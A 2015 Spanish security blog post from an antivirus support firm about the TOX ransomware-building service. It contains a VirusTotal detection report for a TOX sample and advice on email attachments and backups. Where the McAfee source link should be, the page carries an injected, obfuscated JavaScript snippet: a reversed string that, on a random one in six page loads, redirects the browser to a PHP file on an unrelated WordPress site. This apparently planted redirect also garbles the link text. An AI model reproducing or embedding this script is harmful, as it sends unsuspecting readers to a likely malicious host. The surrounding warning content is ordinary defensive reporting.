INFORMACION DE LA CREACION DE UN RANSOMWARE CON LA APLICACION TOX

Si bien por lógica aplastante, no vamos a ofrecer enlace de la utilidad TOX, que permite en TOR crear ransomwares a “gusto del usuario”, sí que hemos creido interesante ofrecer este artúculo de Jim Walter, Director of Advanced Threat Research for Intel Security donde, en inglés original, se exponen los pasos con los que cuenta dicha aplicación, para lograr el ransomware “a medida”
to : Jim Walker, de IntelSecurity
$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tox-ransomware-for-the-rest-of-us”>https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us

Y el preanalisis de virustotal sobre un fichero RANSOM TOX, ofrece el siguiente informe:

MD5 91da679f417040558059ccd5b1063688
SHA1 2848f952f455dccaa779bc31d40061da8f58551d
File size 2.3 MB ( 2453504 bytes )
SHA256: f83b212733ea95c5d48b4fed4b242ae128c900c7ca745e0162bc14e47e29439a
File name: ransom.scr
Detection ratio: 14 / 57
Analysis date: 2015-05-28 08:49:42 UTC

0 2

Antivirus Result Update
AVG Downloader.Generic14.XRQ 20150528
Ad-Aware Gen:Trojan.Heur.TP.vMW@bSvkp1hi 20150528
Avast Win32:Malware-gen 20150528
Avira TR/Ransom.2453504 20150528
BitDefender Gen:Trojan.Heur.TP.vMW@bSvkp1hi 20150528
Emsisoft Gen:Trojan.Heur.TP.vMW@bSvkp1hi (B) 20150528
F-Secure Gen:Trojan.Heur.TP.vMW@bSvkp1hi 20150528
GData Gen:Trojan.Heur.TP.vMW@bSvkp1hi 20150528
Kaspersky Trojan-Ransom.Win32.Toxic.a 20150528
Malwarebytes Trojan.Ransom.Tox 20150528
McAfee Ransom-Tox-FAA!91DA679F4170 20150528
MicroWorld-eScan Gen:Trojan.Heur.TP.vMW@bSvkp1hi 20150528
Symantec Trojan.Cryptolocker 20150528
TrendMicro-HouseCall TROJ_CRYPTOX.SM 20150528

Por lo menos los principales antivirus ya lo controlan, aunque posiblemente sea mutante y nos encontremos con variantes no controladas…

Mucho cuidado con los anexados a los mails…

 

SE RECUERDA UNA VEZ MAS:

“No deben ejecutarse ficheros anexados a mails no solicitados, ni pulsar en sus links ni en imagenes de los mismos, y NUNCA rellenar datos particulares que se pidan por e-mail, especialmente contraseñas de correo o de cuentas bancarias.”

Y que se debe mantener al día y fuera del acceso compartido, copia de seguridad incremental de los datos.
saludos

ms, 3-6-2015

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies